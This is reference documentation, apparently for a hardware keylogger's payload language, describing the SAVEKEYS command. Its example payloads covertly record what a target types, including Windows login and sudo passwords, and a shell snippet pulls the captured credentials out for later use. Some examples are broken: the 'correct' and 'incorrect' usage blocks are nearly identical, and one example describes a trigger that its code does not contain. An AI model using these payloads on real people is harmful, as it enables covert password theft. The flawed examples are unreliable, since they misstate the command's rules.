The SAVEKEYS Command

SAVEKEYS allows the payload to save specific keys typed by the target when the payload has executed with a valid MATCH. SAVEKEYS can either save the LAST keys typed before a MATCH, or the NEXT keys typed after a MATCH.


SAVEKEYS /absolute/path/to/file.log [NEXT | LAST | UNTIL] N (Number of keys)


Here's a brief example of using SAVEKEYS with NEXT:

MATCH hello
SAVEKEYS /root/loot/test.log NEXT 6

Imagine the target were to type "hello world". These 11 keys (the 10 characters and 1 spacebar key press) would be saved to the keylog files. As soon as the 5th key was pressed, completing the string "hello", the above example payload would execute based on the first line MATCH statement. The second line of the payload would then instruct the framework to save the next 6 keypresses to a test.log file in /root/loot/.

In this case when the target types "hello world" the payload executes, creating a new file in /root/loot/test.log containing " world".


In addition to saving a specified number of keys to save with the NEXT parameter, SAVKEYS also features a UNTIL function (added in 1.3) which will save up to 255 keys UNTIL the specified key (regex value) is pressed.

SAVEKEYS /root/loot/windows-pass.txt UNTIL \[ENTER\]

In this example, the payload begins recording keystrokes to the pass.txt file when the CONTROL-ALT-DELETE keyboard combination is pressed, and continues to record until the ENTER key is pressed.

Note the escape characters before [ and ] in these regular expressions.

MATCH sudo(.*?)\[ENTER\]
SAVEKEYS /root/loot/sudo-pass.txt UNTIL \[ENTER\]


In addition to saving the next keys typed after a MATCH, the SAVEKEYS command may be used to save the LAST keys typed before a MATCH.

To recycle our SAVEKEYS NEXT example above, we could modify with the following:

MATCH world
SAVEKEYS /root/loot/test.log LAST 7

In this case when the target types "hello world" the payload gets executed on the 11th keypress, when the MATCH "world" were completed, and the previously typed 7 keys would be saved to the /root/loot/test.log file. This would result in a log file containing "hello ".

Additional SAVEKEYS Considerations

A maximum of 128 keys may be stored with SAVEKEYS either NEXT or LAST.

SAVEKEYS requires an absolute path for the output file. It cannot take a variable.

  • SAVEKEYS /tmp/keys.txt LAST 10 – correct usage

  • SAVEKEYS $keyfile LAST 10 – incorrect usage

If SAVEKEYS is to be used in a payload, it must immediately follow a MATCH command.

Correct SAVEKEYS usage

MATCH hello
SAVEKEYS /root/loot/text.log NEXT 6

Incorrect SAVEKEYS usage

MATCH hello
SAVEKEYS /root/loot/test.log NEXT 6

Keys of interest saved with SAVEKEYS may be extracted systematically using text processing tools and used later as variables in a payload. It is important to note a payload will need to wait until the keys are saved – so pay special attention to the while command. For example:

# Save the next 30 keys typed after the CTRL-ALT-DELETE key combo is pressed
SAVEKEYS /tmp/login NEXT 30

# Wait until the login file is written (30 keys are pressed)
while [ ! -f /tmp/login ]; do sleep 2; done

# Define variable of keys typed before ENTER, removing any TAB keys
CREDS=$(cat /tmp/login | sed 's/\[TAB\]//g' | awk -F'\[ENTER\]' '{print $1}')

Similar to MATCH, one should consider that SAVEKEYS is not actually a bash command but rather a Key Croc command which is interpreted by the Payload Framework. Changes to the SAVEKEYS command requires a reboot or issuing the RELOAD_PAYLOADS command. Additionally, the CHECK_PAYLOADS command will check the syntax and display the payload which will execute after the corresponding MATCH is typed by the target.

Do not use the word "SAVEKEYS" in a payload's comment as doing so will cause interpretation issues with the Key Croc payload parser.

Last updated